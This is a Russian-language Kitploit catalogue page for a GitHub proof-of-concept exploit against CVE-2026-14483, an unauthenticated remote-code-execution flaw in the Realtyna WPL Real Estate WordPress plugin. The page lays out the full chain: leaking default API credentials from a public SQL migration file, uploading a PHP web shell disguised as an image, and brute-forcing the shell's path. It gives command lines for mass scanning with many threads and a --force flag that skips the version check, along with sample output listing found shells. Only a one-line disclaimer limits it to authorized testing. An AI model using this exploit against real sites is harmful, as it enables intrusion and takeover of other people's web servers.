Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-14483 — CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS | Kitploit
Инструменты/GitHubGitHub/madexploits/cve-2026-14483
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS

Репозиторий
121 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-14483 — WPL Real Estate RCE

Удалённое выполнение кода без аутентификации в WordPress-плагине Realtyna WPL Real Estate Listing.

Скачать инструмент
ПолеДетали
CVECVE-2026-14483
Затронутая версия<= 5.2.0
Плагинreal-estate-listing-realtyna-wpl
ВоздействиеЗагрузка PHP-веб-шелла без аутентификации (RCE)
СкриптCVE-2026-14483.py
АвторMADEXPLOITS

По умолчанию скрипт только эксплуатирует цели, на которых работает WPL 5.2.0. Используйте --force, чтобы отключить это ограничение.

ИЗОБРАЖЕНИЕ


Сводка по уязвимости

  1. Утечка учётных данных — значения api_key / api_secret по умолчанию раскрываются через публичный дамп SQL-миграции.
  2. Загрузка без аутентификации — эти учётные данные аутентифицируют WPL I/O API (set_property), что позволяет загрузить подготовленный PHP-файл в качестве изображения объекта недвижимости.
  3. Обнаружение веб-шелла — загруженный шелл находится по пути wp-content/uploads/WPL/{property_id}/.

Требования

root@kitploit:~
pip install requests colorama
  • Python 3.8+
  • Сетевой доступ к целевым хостам

Использование

Список целей

Создайте текстовый файл, в котором каждая строка содержит один базовый URL:

root@kitploit:~
http://wplab.test
https://example.com

Базовый запуск

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt

URL найденных шеллов добавляются в result.txt (или в файл, указанный в --output).

Все параметры

root@kitploit:~
python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force
АргументПо умолчаниюОписание
--targets(обязательный)Файл с базовыми URL (по одному на строку)
--outputresult.txtФайл для добавления найденных URL шеллов
--user-id1ID пользователя WordPress / WPL, которому принадлежит новый объект недвижимости
--payloadвстроенный загрузочный шеллСтрока с произвольной PHP-нагрузкой
--max-id1000Максимальный ID объекта недвижимости для перебора при поиске шелла
--timeout30Таймаут HTTP в секундах
--threads5Количество параллельных рабочих потоков
--debugвыкл.Подробное отладочное логирование
--forceвыкл.Эксплуатировать, даже если версия ≠ 5.2.0 или версию не удалось определить

Порядок эксплуатации

root@kitploit:~
Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

Маркер шелла по умолчанию: MADEXPLOITS
Удалённое имя файла по умолчанию: 0x89MADEXPLOITS.php


Примеры

Одиночная лабораторная цель (это рабочее пространство):

root@kitploit:~
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

Массовое сканирование с большим числом потоков:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

Принудительная эксплуатация при сбое проверки версии:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --force

Вывод

root@kitploit:~
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

result.txt содержит по одному URL шелла на строку.


Примечания

  • Версия считывается из Stable tag: / Version: в readme.txt плагина, запасной вариант — wpl.php.
  • Если шелл не найден после загрузки, увеличьте --max-id.
  • Только для авторизованного тестирования безопасности и использования в локальной лаборатории.